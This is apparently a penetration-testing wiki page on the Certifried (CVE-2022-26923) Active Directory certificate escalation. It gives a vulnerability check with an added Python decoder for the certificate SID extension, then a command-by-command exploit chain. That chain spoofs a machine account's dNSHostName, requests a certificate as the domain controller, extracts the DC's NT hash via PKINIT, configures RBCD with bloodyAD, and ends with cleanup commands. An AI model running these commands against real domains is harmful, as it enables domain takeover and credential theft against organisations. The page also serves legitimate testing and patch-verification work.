# dNSHostName Spoofing (Certifried)

* <https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4>
* <https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7>
* <https://www.semperis.com/blog/ad-vulnerability-cve-2022-26923/>
* <https://gist.github.com/Wh04m1001/355c0f697bfaaf6546e3b698295d1aa1>
* <https://gist.github.com/dmchell/478d83f369260bd4e4cd380712f6bb6e>
* <https://github.com/aniqfakhrul/certifried.py>
* <https://gist.github.com/tothi/f89a37127f2233352d74eef6c748ca25>

## Check

If an object SID is printed when requesting a certificate based on the User or Machine template, the AD environment is **not** vulnerable:

```
$ certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -target CA01.megacorp.local -ca CorpCA -template User -dc-ip 192.168.1.11
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 120
[*] Got certificate with UPN 'snovvcrash@megacorp.local'
[*] Certificate object SID is 'S-1-5-21-1230029644-1443616230-1161330039-2139'  <== NOT vulnerable
[*] Saved certificate and private key to 'snovvcrash.pfx'
```
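The SID that the check above looks for is carried in the certificate's `szOID_NTDS_CA_SECURITY_EXT` extension (OID `1.3.6.1.4.1.311.25.2`); the following added Python, which is not from this page or from Certipy, decodes that extension value so the patch state of a CA can be verified from an issued certificate without trusting a tool's summary line. The DER bytes in the sample are constructed here; in practice you feed in the raw value of that extension taken from the certificate.

```python
# Added example: decode szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2).
# Its value is DER: SEQUENCE { SEQUENCE { OID 1.3.6.1.4.1.311.25.2.1,
#   [0] EXPLICIT { OCTET STRING "S-1-5-21-..." } } }   (an OtherName list)
SECURITY_EXT_OID = "1.3.6.1.4.1.311.25.2"
OBJECTSID_OID = bytes.fromhex("2b060104018237190201")  # DER body of 1.3.6.1.4.1.311.25.2.1

def _read_tlv(buf, pos=0):
    """Read one DER TLV at pos; return (tag, value bytes, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                   # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated DER")
    return tag, buf[pos:pos + length], pos + length

def _tlv(tag, payload):
    """Encode one DER TLV (used only to build the constructed sample below)."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload

def extract_sid(ext_value):
    """Return the SID string carried by the extension value, or None if absent."""
    tag, outer, _ = _read_tlv(ext_value)
    if tag != 0x30:
        raise ValueError("security extension value is not a SEQUENCE")
    pos = 0
    while pos < len(outer):                             # each item is an OtherName SEQUENCE
        tag, other_name, pos = _read_tlv(outer, pos)
        if tag != 0x30:
            continue
        oid_tag, oid, p = _read_tlv(other_name)
        if p >= len(other_name):                        # type-id without a value: skip
            continue
        ctx_tag, ctx, _ = _read_tlv(other_name, p)
        if oid_tag == 0x06 and oid == OBJECTSID_OID and ctx_tag == 0xA0:
            str_tag, sid, _ = _read_tlv(ctx)
            if str_tag == 0x04:
                return sid.decode("ascii")
    return None                                         # no SID: what an unpatched CA issues

# Constructed sample: the SID from the check output above, plus an extension
# whose only OtherName has a different type-id and therefore carries no SID.
SAMPLE_SID = "S-1-5-21-1230029644-1443616230-1161330039-2139"
SAMPLE_EXT = _tlv(0x30, _tlv(0x30, _tlv(0x06, OBJECTSID_OID) + _tlv(0xA0, _tlv(0x04, SAMPLE_SID.encode()))))
NO_SID_EXT = _tlv(0x30, _tlv(0x30, _tlv(0x06, b"\x2b\x06\x01") + _tlv(0xA0, _tlv(0x04, b"x"))))
```

`extract_sid` returning `None` for a freshly issued User or Machine certificate is the same signal as the missing "Certificate object SID" line above.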

## Exploit

Create a new machine account whose `dNSHostName` contains the FQDN of a DC:

```
$ certipy account create -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user FAKEMACHINE -dns DC01.megacorp.local
```

Or change the `dNSHostName` property manually for an already pwned machine account, e.g. one taken over via [pre2k](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/pre-created-computers-abuse/README.md#acl-abuse-on-pre-windows-2000-computers) (this will definitely break stuff!):

```
$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns ''
$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns DC01.megacorp.local
```

Request a certificate on behalf of that machine account with spoofed `dNSHostName`:

```
$ certipy req -u 'FAKEMACHINE$@megacorp.local' -p 'M4chinePassw0rd!' -target CA01.megacorp.local -ca CorpCA -template Machine -dc-ip 192.168.1.11
```

### Abuse PKINIT

Authenticate with the obtained certificate and get the DC's NT hash via PKINIT:

```
$ certipy auth -pfx dc01.pfx -dc-ip 192.168.1.11
```

### Abuse RBCD

* <https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html>

Authenticate with the obtained certificate and configure RBCD on the DC via [bloodyAD](https://github.com/CravateRouge/bloodyAD), so that the fake machine account is allowed to delegate to the DC:

```
$ openssl pkcs12 -in dc01.pfx -out dc01.pem -nodes
$ python bloodyAD.py -d megacorp.local -c ":dc01.pem" --host 192.168.1.11 setRbcd 'FAKEMACHINE$' 'DC01$'
```

### Clean Up

If `dNSHostName` was modified for an existing machine account, roll back the changes:

```
$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns PWNEDMACHINE.megacorp.local
$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns WSMAN/pwnedmachine.MEGACORP.LOCAL,WSMAN/pwnedmachine,TERMSRV/pwnedmachine.MEGACORP.LOCAL,TERMSRV/pwnedmachine,RestrictedKrbHost/pwnedmachine,HOST/pwnedmachine,RestrictedKrbHost/pwnedmachine.MEGACORP.LOCAL,HOST/pwnedmachine.MEGACORP.LOCAL
```

{% hint style="info" %}
The list of SPNs to back up can be taken from a BloodHound dump:

```
$ cat 20230301144823_computers.json | jq -r '.data[].Properties | select(.name == "PWNEDMACHINE.MEGACORP.LOCAL") | .serviceprincipalnames'
```

{% endhint %}

## About the Fix

* <https://blog.qdsecurity.se/2022/05/27/manually-injecting-a-sid-in-a-certificate/>
* <https://github.com/GhostPack/Certify/commit/71636c435f2e5e7d8d0770154464f44da356ca42>
* <https://elkement.blog/2022/06/13/defused-that-san-flag/>
* <https://elkement.blog/2022/05/20/how-to-add-a-subject-alternative-name-safely/>
* <https://elkement.blog/2023/03/30/lord-of-the-sid-how-to-add-the-objectsid-attribute-to-a-certificate-manually/>
